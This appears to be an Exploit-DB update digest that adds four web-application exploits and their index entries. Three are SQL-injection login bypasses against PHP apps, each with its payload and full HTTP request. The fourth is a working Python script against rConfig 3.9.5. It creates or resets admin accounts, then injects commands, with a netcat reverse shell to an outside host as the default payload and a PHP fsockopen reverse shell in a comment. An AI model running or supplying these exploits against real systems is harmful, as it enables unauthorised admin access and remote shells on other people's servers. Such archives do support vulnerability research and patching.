DB: 2020-10-16

4 changes to exploits/shellcodes

Vehicle Parking Management System 1.0 - Authentication Bypass
rConfig 3.9.5 - Remote Code Execution (Unauthenticated)
Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass
Zoo Management System 1.0 - Authentication Bypass

exploits/php/webapps/48877.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Vehicle Parking Management System 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-10-14
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : /login.php
+# Parameter & Payload: username: '=''or'@email.com password: '=''or'
+# Proof of Concept: http://localhost/lagos-parker/login.php
+
+POST /lagos-parker/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 73
+Referer: http://localhost/lagos-parker/login.php
+Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=: undefined

exploits/php/webapps/48878.py

@@ -0,0 +1,177 @@
+# Exploit Title: rConfig 3.9.5 - Remote Code Execution (Unauthenticated)
+
+# Google Dork: N/A
+# Date: 2020-10-13
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://www.rconfig.com/
+# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.5.zip
+# Version: rConfig v3.9.5
+# Tested on: CentOS 7 x64
+# CVE : N/A
+
+
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+import urllib3
+import re
+#from bs4 import BeautifulSoup
+
+urllib3.disable_warnings()
+
+url="https://x.x.x.x/" #change this to fit your URL (adding the last slash)
+payload="nc y.y.y.y 9001 -e /bin/sh"  #change this to whatever payload you want
+payload_rce= "fileName=../www/test.php&code=<%3fphp+echo+system('ls')%3b%3f>&id=3" #if you want to use Method 2 for RCE, use a PHP, urlencoded payload as the value of the code parameter
+
+print("Connecting to: {}".format(url))
+print("Connect back is set to: {}, please launch 'nc -lv 9001'".format(payload))
+
+x = requests.get(url+"login.php", verify=False)
+version = re.search("<p>(.*)<span>", x.text)
+version = version.group(1)
+
+if version == "rConfig Version 3.9.5":
+   print("Version 3.9.5 confirmed")
+else:
+   print("Version is "+version+ " it may not be vulnerable")
+
+payload_final=";"+payload
+referer=url+"useradmin.php"
+origin=url
+proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} #in case you need to debug the exploit with Burp, add ', proxies=proxies' to any request
+
+def createuser():
+
+    multipart_data = MultipartEncoder(
+       fields={
+               'username': 'test', 
+               'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol
+               'passconf': 'Testing1@',
+               'email': 'test@test.com',
+               'ulevelid': '9',
+               'add': 'add',
+               'editid': ''
+              }
+       )
+    headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin}
+    cookies = {'PHPSESSID': 'test'}
+    response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False)
+    if "error" not in response.text:
+        print("(+) User test created")
+    else:
+        print("(-) User couldn't be created, please debug the exploit")
+
+
+def exploit():
+    payload = {
+    'user': 'test',
+    'pass': 'Testing1@',
+    'sublogin': '1'
+}
+    with requests.Session() as s:
+         p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False)
+         if "Stephen Stack" in p.text:
+            print("(-) Exploit failed, could not login as user test")
+         else:
+            print("(+) Log in as test completed")
+            params = {'path':'test',
+                      'ext': payload_final
+                     }
+            rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params)
+            if "success" in rce.text:
+                print("(+) Payload executed successfully")
+            else:
+                print("(-) Error when executing payload, please debug the exploit") #if you used method 2 to auth bypass and 1 for RCE, ignore this message
+    payload = {
+    'user': 'admin',
+    'pass': 'Testing1@',
+    'sublogin': '1'
+}
+    with requests.Session() as s:
+         p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False)
+         if "Stephen Stack" in p.text:
+            print("(-) Exploit failed, could not login as user test")
+         else:
+            print("(+) Log in as test completed")
+            params = {'path':'test',
+                      'ext': payload_final
+                     }
+            rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params)
+            if "success" in rce.text:
+                print("(+) Payload executed successfully")
+            else:
+                print("(-) Error when executing payload, please debug the exploit")
+
+
+def user_enum_update():
+    users=requests.get(url+'useradmin.inc.php', verify=False)
+    #matchObj = re.findall(r'<td align="center">(.*?)</td>', users.text, re.M|re.I|re.S)
+    
+    if "admin" in users.text:
+      print("(+) The admin user is present in this rConfig instance")
+      multipart_data = MultipartEncoder(
+       fields={
+               'username': 'admin', 
+               'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol
+               'passconf': 'Testing1@',
+               'email': 'admin@admin.com',
+               'ulevelid': '9',
+               'add': 'add',
+               'editid': '1' #you may need to increment this if you want to reset the password of a different user
+              }
+       )
+      headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin}
+      cookies = {'PHPSESSID': 'test'}
+      response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False)
+      if "error" not in response.text:
+          print("(+) The new password for the admin user is Testing1@")
+      else:
+          print("(-) Admin user couldn't be edited, please debug the exploit")
+    elif  "Admin" in users.text:
+       print("(+) There is at least one Admin user, check "+ str(url)+"useradmin.inc.php manually and modify the exploit accordingly (erase the if-elif statements of this function and modify the user payload)")
+    
+def template():
+    payload = {
+    'user': 'admin',
+    'pass': 'Testing1@',
+    'sublogin': '1'
+}
+    
+    #<%3fphp+%24sock%3Dfsockopen%28%22192.168.1.13%22%2C1234%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%3f>
+    headers_rce = {'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8", "Referer": url+"deviceConnTemplates.php", "Origin":origin, "X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.5"}
+    with requests.Session() as s:
+         p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False)
+         if "Stephen Stack" in p.text:
+            print("(-) Exploit failed, could not login as user test")
+         else:
+            print("(+) Log in as admin completed")
+            rce=s.post(url+'lib/ajaxHandlers/ajaxEditTemplate.php', verify=False, data=payload_rce, headers=headers_rce)
+            if "success" in rce.text:
+                print("(+) File created")
+                rce_req = s.get(url+'test.php.yml', verify=False)
+                print("(+) Command results: ")
+                print(rce_req.text)
+            else:
+                print("(-) Error when executing payload, please debug the exploit")
+
+def main():
+    print("Remote Code Execution + Auth bypass rConfig 3.9.5 by Daniel Monzón")
+    print("In the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)")
+    print("Note: preferred method for auth bypass is 1, because it is less 'invasive'")
+    print("Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machine")
+    print('''Choose method for authentication bypass:
+        1) User creation
+        2) User enumeration + User edit ''')
+    auth_bypass=str(input("Method>"))
+    if auth_bypass == "1":
+       createuser()
+    elif auth_bypass == "2":
+       user_enum_update()
+    print('''Choose method for RCE:
+        1) Unsafe call to exec()
+        2) Template edit ''')
+    rce_method=str(input("Method>"))
+    if rce_method == "1":
+       exploit()
+    elif rce_method == "2":
+       template()
+main()

exploits/php/webapps/48879.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass
+# Date: 24/09/2020
+# Exploit Author: Saurav Shukla & Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14461/simple-grocery-store-sales-and-inventory-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sales-inventory-system-using-php.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+Step 1: Open the URL http://localhost/sales_inventory/login.php
+
+Step 2: use payload jyot' or 1=1# in user and password field
+
+Malicious Request:::
+
+
+POST /sales_inventory/ajax.php?action=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 53
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/sales_inventory/login.php
+Cookie: PHPSESSID=hdk9npcmq341ulcsn8cj6oefov
+
+username=jyot'+or+1%3d1%23&password=jyot'+or+1%3D1%23

exploits/php/webapps/48880.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Zoo Management System 1.0 - Authentication Bypass
+# Date: 02/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=12723
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/zoo/zms/admin/index.php
+
+Step 2: use payload jyot' or 1=1# in user and password field
+
+Malicious Request
+
+POST /zoo/zms/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 66
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/zoo/zms/admin/index.php
+Cookie: PHPSESSID=s22oss00i0ob4hcnsgkobb9r7p
+Upgrade-Insecure-Requests: 1
+
+username=jyot%27+or+1%3D1+%23&password=jyot%27+or+1%3D1+%23&login=
+
+Step 3: You will be logged in as admin.

files_exploits.csv

@@ -40695,6 +40695,10 @@ id,file,description,date,author,type,platform,port
 48872,exploits/php/webapps/48872.txt,"berliCRM 1.0.24 - 'src_record' SQL Injection",2020-10-13,"Ahmet Ümit BAYRAM",webapps,php,
 48874,exploits/php/webapps/48874.py,"TimeClock Software 1.01 0 - (Authenticated) Time-Based SQL Injection",2020-07-23,"François Bibeau",webapps,php,
 48875,exploits/multiple/webapps/48875.txt,"NodeBB Forum 1.12.2-1.14.2 - Account Takeover",2020-10-14,"Muhammed Eren Uygun",webapps,multiple,
+48877,exploits/php/webapps/48877.txt,"Vehicle Parking Management System 1.0 - Authentication Bypass",2020-10-15,BKpatron,webapps,php,
+48878,exploits/php/webapps/48878.py,"rConfig 3.9.5 - Remote Code Execution (Unauthenticated)",2020-10-15,"Daniel Monzón",webapps,php,
+48879,exploits/php/webapps/48879.txt,"Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass",2020-10-15,"Saurav Shukla",webapps,php,
+48880,exploits/php/webapps/48880.txt,"Zoo Management System 1.0 - Authentication Bypass",2020-10-15,"Jyotsna Adhana",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,